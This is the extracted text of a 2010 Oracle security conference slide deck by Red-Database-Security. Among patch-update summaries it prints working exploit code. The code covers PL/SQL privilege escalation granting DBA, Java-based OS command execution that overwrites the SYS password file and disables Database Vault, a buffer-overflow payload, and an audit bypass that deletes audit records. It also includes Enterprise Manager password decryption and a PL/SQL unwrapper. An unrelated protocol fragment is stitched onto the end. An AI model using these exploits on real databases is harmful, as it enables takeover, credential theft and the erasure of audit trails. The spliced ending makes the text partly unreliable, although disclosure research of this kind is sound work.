Best of Oracle Security by Red-Database-Security

Size: px

Start display at page:

Download "Best of Oracle Security by Red-Database-Security"

Primrose Booth
6 years ago
Views:

1 Best of Oracle Security by Red-Database-Security

2 Introduction Oracle Critical Patch Updates Passwords & Encryption Auditing & Database Vault Intercept network traffic PL/SQL Unwrapper

3 Oracle Critical Patch Updates January 2010 CPU (9 Vulnerabilities) April 2010 CPU (8 Vulnerabilities) July 2010 CPU (6 Vulnerabilities) October 2010 CPU (8 Vulnerabilities)

4 January 2010 CPU* Listener Bug (CVE ) + Exploit Code** published APEX 3.2 bug fixes. Many APEX security bugs are silently fixed with 4.0 Additional bugs in Oracle Spatial, Logical standby, data pump and OLAP fixed * **

5 April 2010 CPU* Critical Java Bug (0day) fixed Auditing bug fixed XML DB bug fixed

6 dbms_jvm_exp_perms ( ) DECLARE POL DBMS_JVM_EXP_PERMS.TEMP_JAVA_POLICY; CURSOR C1 IS SELECT GRANT,USER(), SYS, java.io.filepermission, <<ALL FILES>>, execute, ENABLED from dual; BEGIN OPEN C1; FETCH C1 BULK COLLECT INTO POL; CLOSE C1; DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL); END; / select dbms_java.runjava( oracle/aurora/util/wrapper c:\ \windows\\system32\\cmd.exe /c dir>c:\\out.lst )from dual;

7 July 2010 CPU* Remote exploitable listener bug OLAP APEX Export

8 October 2010 CPU* Enterprise Manager SQL Injection JVM bug Change Data Capture (+ Exploit published) Job Queue - Bypass Oracle Auditing OLAP *

9 dbms_cdc_publish ( ) create or replace function pwn return varchar2 authid current_user is PRAGMA autonomous_transaction; BEGIN execute immediate grant dba to scott ; commit; return z ; END; grant execute on SCOTT.pwn to public begin sys.dbms_cdc_publish.create_change_set( a', a', a SCOTT.pwn () a,'y,sysdate, sysdate); end;

10 Password & Encryption Get Oracle clear text password on server on client Decrypt DB Link passwords Decrypt EM encrypted passwords Decrypt TDE encrypted data Oracle TDE & AES-NI New Password Cracker

11 Get Oracle Clear Text Password Inject a custom DLL/LIB in the Oracle process space Intercept the hashing function calls in the memory Oracle is passing the clear text password and this will be printed Not detectable from the database Code available for Windows and Linux

12 Get Clear Text Passwords

13 Demonstration

14 Decrypt DB Link Passwords Oracle 8-9 database link passwords were stored in clear text in SYS.LINK$ Since Oracle 10g the passwords are encrypted There are at least 3 different approaches available to decrypt the passwords

15 Decrypt DB Link Passwords

16 Decrypt EM Passwords Older versions of EM used the SYSMAN.DECRYPT function to get the cleartext password select credential_set_column, sysman.decrypt(credential_value) from SYSMAN.MGMT_CREDENTIALS2; Newer versions

17 Decrypt EM Passwords II

18 Decrypt EM Passwords III

19 Decrypt TDE encrypted Data By using the DLL injection it is possible to log the wallet password and the master key This master key can be used to decrypt the tablespace and/or the table keys Using an external tool it is possible to decrypt the encrypted data file using the master key *

20 Demonstration

21 New Password Cracker OPS_SSE2 Fastest SW-solution so far Up to 42 million passwords / sec on a Core i7-980x@3.8 GHz 7 alphanumeric characters, 31 minutes 8 alphanumeric characters, 19 hours 9 alphanumeric characters, 28 days *

22 AES-NI & TDE " AES-NI is an instruction set of new Intel processors which improve the encryption/ decryption via hardware. " Oracle 11g and Transparent Data Encryption (TDE) in AES-256 CBC: The usage of the optimized Intel Integrated Performance Primitives (IPP) shows an 89 percent reduction (3.33 GHz Xeon X5680 vs 2.8 Intel Xeon X5560) against a previous processor.

23 Oracle Database Vault & Auditing Bypass Oracle Database Vault Bypass Oracle Auditing *

24 Bypass Oracle Database Vault* Different techniques to bypass Oracle Database Vault Switch it off on OS Level Via buffer overflows Via alter session *

25 Bypass using Java I EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'writefiledescriptor', '' ); EXEC dbms_java.grant_permission( 'ONEDBA', 'SYS:java.lang.RuntimePermission', 'readfiledescriptor', '' ); CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "SRC_EXECUTEOS" AS import java.lang.*; import java.io.*; public class ExecuteOS { public static void execoscmd (String cmd) throws IOException, java.lang.interruptedexception { String[] strcmd = {"cmd.exe", "/c", cmd}; Process p = Runtime.getRuntime().exec(strCmd); p.waitfor(); } }; /

26 Bypass using Java II CREATE OR REPLACE PROCEDURE "PROC_EXECUTEOS" (p_command varchar2) AS LANGUAGE JAVA NAME 'ExecuteOS.execOSCmd (java.lang.string)'; / Execute OS commands: EXEC PROC_EXECUTEOS ('C:\app\Administrator\product \11.2.0\dbhome_1\BIN\orapwd.exe file=c:\app\administrator \product\11.2.0\dbhome_1\database\pwdorcl.ora force=y password=anypass nosysdba=n'); EXEC PROC_EXECUTEOS ('ren C:\app\Administrator\product \11.2.0\dbhome_1\BIN\oradv11.dll oradv11_.dll');

27 Bypass using Buffer Overflow DECLARE OS_COMMAND VARCHAR2(504); RET_VALUE_X123 VARCHAR2(32767); P_DIRPATH VARCHAR2(32767); BEGIN -- Disable DB Vault: OS_COMMAND:='ren..\bin\oradv10.dll oradv10_.dll'; -- Enable SYSDBA access and overwrite SYS password: OS_COMMAND:='..\bin\orapwd.exe file=..\dbs\orapworcl force=y nosysdba=n password=anypass ; P_DIRPATH := ' chr(54) chr(141) chr(67) chr(19) chr(80) chr(184) chr(131) chr(160) chr(187) chr(119) chr(255) chr(208) chr(184) chr(31) chr(179) chr(188) chr(119) chr(255) chr(208) RPAD(OS_COMMAND chr(38), 505) CHR(96) CHR(221) CHR (171) CHR(118); RET_VALUE_X123 := SYS.KUPF$FILE_INT.GET_FULL_FILENAME(DIRPATH => P_DIRPATH, NAME => 'B', EXTENSION => '', VERSION => ''); END; /

28 Bypass using alter session SQL> connect onedba/onedba Connected. SQL> drop table hr.jobs cascade constraints; drop table hr.jobs cascade constraints * ERROR at line 1: ORA-00604: error occurred at recursive SQL level 1 ORA-47401: Realm violation for drop table on HR.JOBS ORA-06512: at DVSYS.AUTHORIZE_EVENT, line 55 ORA-06512: at line 13 Switch to a different NLS_LANGUAGE SQL> alter session set NLS_LANGUAGE= LATIN AMERICAN SPANISH ; Session altered. SQL> drop table hr.jobs cascade constraints; Table dropped.

29 Bypass Oracle Auditing Via Explain plan (fixed in April 2010 CPU) Using dbms_ijob (fixed in Oct 2010 CPU)

30 Bypass Auditing using dbms_ijob Declare jj integer := ; job number Begin sys.dbms_ijob.submit( JOB => jj, LUSER => 'SYS', PUSER => 'SYS', CUSER => 'SYS, NEXT_DATE => sysdate, INTERVAL => null, BROKEN => false, WHAT => declare jj integer := ' jj ; begin execute immediate ''alter system archive log current' ; sys.dbms_ijob.remove(jj); delete from sys.aud$ where obj$name = ''DBMS_IJO''; commit; end;, NLSENV => 'NLS_LANGUAGE=''AMERICAN'' NLS_TERRITORY=''AMERICA'' NLS_CURRENCY=''$'' NLS_ISO_CURRENCY=''AMERICA'' NLS_NUMERIC_CHARACTERS=''.,'' NLS_DATE_FORMAT=''DD-MON-RR'' NLS_DATE_LANGUAGE=''AMERICAN'' NLS_SORT=''BINARY'', ENV => hextoraw(' )); sys.dbms_ijob.run(jj); exception when others then if sqlcode= then sys.dbms_ijob.remove(jj); end if; Raise; end; /

31 Intercept Network Traffic Vamp Villanious ARP Manipulation Program Packet Injection Thicknet

32 VAMP Arpspoofing program Doing ARP request poising Request SHA: Source MAC (requestor) SIP: Source IP THA: Target MAC (usually unknown, 0) TIP: Target IP (IP requestor is looking for) Who has (00:00:00:00:00:00)? Tell (00:00:0d:ef:ac:ed)

33 Packet Injection 2 types of injection: packet modification and takeover Packet modification: client or server sends data attacker is modifying it Takeover Allows us to send arbitrary packets into the session Issue asynchronus SQL queries,

34 Thicknet After an established connection, Thicknet can manipulate active Oracle sessions (e.g. create a new user inside of a session)

35 Demonstration

36 PL/SQL Unwrapper First public unwrapper for 10g/11g code was published Python Script* *

37 Unwrapper #!/usr/bin/python # Contact: niels at teusink net / blog.teusink.net # License: Public domain import re Import base64 import zlib import sys # simple substitution table charmap = [0x3d, 0x65, 0x85, 0xb3, 0x18, 0xdb, 0xe2, 0x87, 0xf1, 0x52, 0xab, 0x63, 0x4b, 0xb5, 0xa0, 0x5f, 0x7d, 0x68, 0x7b, 0x9b, 0x24, 0xc2, 0x28, 0x67, 0x8a, 0xde, 0xa4, 0x26, 0x1e, 0x03, 0xeb, 0x17, 0x6f, 0x34, 0x3e, 0x7a, 0x3f, 0xd2, 0xa9, 0x6a, 0x0f, 0xe9, 0x35, 0x56, 0x1f, 0xb1, 0x4d, 0x10, 0x78, 0xd9, 0x75, 0xf6, 0xbc, 0x41, 0x04, 0x81, 0x61, 0x06, 0xf9, 0xad, 0xd6, 0xd5, 0x29, 0x7e, 0x86, 0x9e, 0x79, 0xe5, 0x05, 0xba, 0x84, 0xcc, 0x6e, 0x27, 0x8e, 0xb0, 0x5d, 0xa8, 0xf3, 0x9f, 0xd0, 0xa2, 0x71, 0xb8, 0x58, 0xdd, 0x2c, 0x38, 0x99, 0x4c, 0x48, 0x07, 0x55, 0xe4, 0x53, 0x8c, 0x46, 0xb6, 0x2d, 0xa5, 0xaf, 0x32, 0x22, 0x40, 0xdc, 0x50, 0xc3, 0xa1, 0x25, 0x8b, 0x9c, 0x16, 0x60, 0x5c, 0xcf, 0xfd, 0x0c, 0x98, 0x1c, 0xd4, 0x37, 0x6d, 0x3c, 0x3a, 0x30, 0xe8, 0x6c, 0x31, 0x47, 0xf5, 0x33, 0xda, 0x43, 0xc8, 0xe3, 0x5e, 0x19, 0x94, 0xec, 0xe6, 0xa3, 0x95, 0x14, 0xe0, 0x9d, 0x64, 0xfa, 0x59, 0x15, 0xc5, 0x2f, 0xca, 0xbb, 0x0b, 0xdf, 0xf2, 0x97, 0xbf, 0x0a, 0x76, 0xb4, 0x49, 0x44, 0x5a, 0x1d, 0xf0, 0x00, 0x96, 0x21, 0x80, 0x7f, 0x1a, 0x82, 0x39, 0x4f, 0xc1, 0xa7, 0xd7, 0x0d, 0xd1, 0xd8, 0xff, 0x13, 0x93, 0x70, 0xee, 0x5b, 0xef, 0xbe, 0x09, 0xb9, 0x77, 0x72, 0xe7, 0xb2, 0x54, 0xb7, 0x2a, 0xc7, 0x73, 0x90, 0x66, 0x20, 0x0e, 0x51, 0xed, 0xf8, 0x7c, 0x8f, 0x2e, 0xf4, 0x12, 0xc6, 0x2b, 0x83, 0xcd, 0xac, 0xcb, 0x3b, 0xc4, 0x4e, 0xc0, 0x69, 0x36, 0x62, 0x02, 0xae, 0x88, 0xfc, 0xaa, 0x42, 0x08, 0xa6, 0x45, 0x57, 0xd3, 0x9a, 0xbd, 0xe1, 0x23, 0x8d, 0x92, 0x4a, 0x11, 0x89, 0x74, 0x6b, 0x91, 0xfb, 0xfe, 0xc9, 0x01, 0xea, 0x1b, 0xf7, 0xce] def decode_base64_package(base64str): base64dec = base64.decodestring(base64str)[20:] # we strip the first 20 chars (SHA1 hash, I don't bother checking it at the moment) decoded = for byte in range(0, len(base64dec)): decoded += chr(charmap[ord(base64dec[byte])]) return zlib.decompress(decoded) sys.stderr.write("=== Oracle 10g/11g PL/SQL unwrapper by Niels Teusink - blog.teusink.net ===\n\n" ) if len(sys.argv) < 2: sys.stderr.write("usage: %s infile.plb [outfile]\n" % sys.argv[0]) sys.exit(1) infile = open(sys.argv[1]) outfile = None if len(sys.argv) == 3: outfile = open(sys.argv[2], 'w ) lines = infile.readlines() for i in range(0, len(lines)): # this is really naive parsing, but works on every package I've thrown at it matches = re.compile(r"^[0-9a-f]+ ([0-9a-f]+)$").match(lines[i]) if matches: base64len = int(matches.groups()[0], 16) base64str = j = 0 while len(base64str) < base64len: j+=1 base64str += lines[i+j] base64str = base64str.replace("\n"," ) if outfile: outfile.write(decode_base64_package(base64str) + "\n ) else: print decode_base64_package(base64str)

38 Summary Oracle out-of-box Security is getting better (especially with ) Attackers are looking for more creative ways to bypass Oracle security (e.g. Man in the middle, DLL Injection) Tools are getting faster / easier to use

39 Thank you Contact: Red-Database-Security GmbH Bliesstr. 16 D Neunkirchen Germany

GNetPlus Communication Protocol

GNetPlus Communication Protocol Basic Package (BINARY VERSION) Master Query Package (HOST) Field Header Address Query Function Data length DATA BYTES Error Check Desc SOH 0~255 0~255 0~255 CRC16_Low CRC16_Hi Size 1 BYTE 1 BYTE 1 BYTE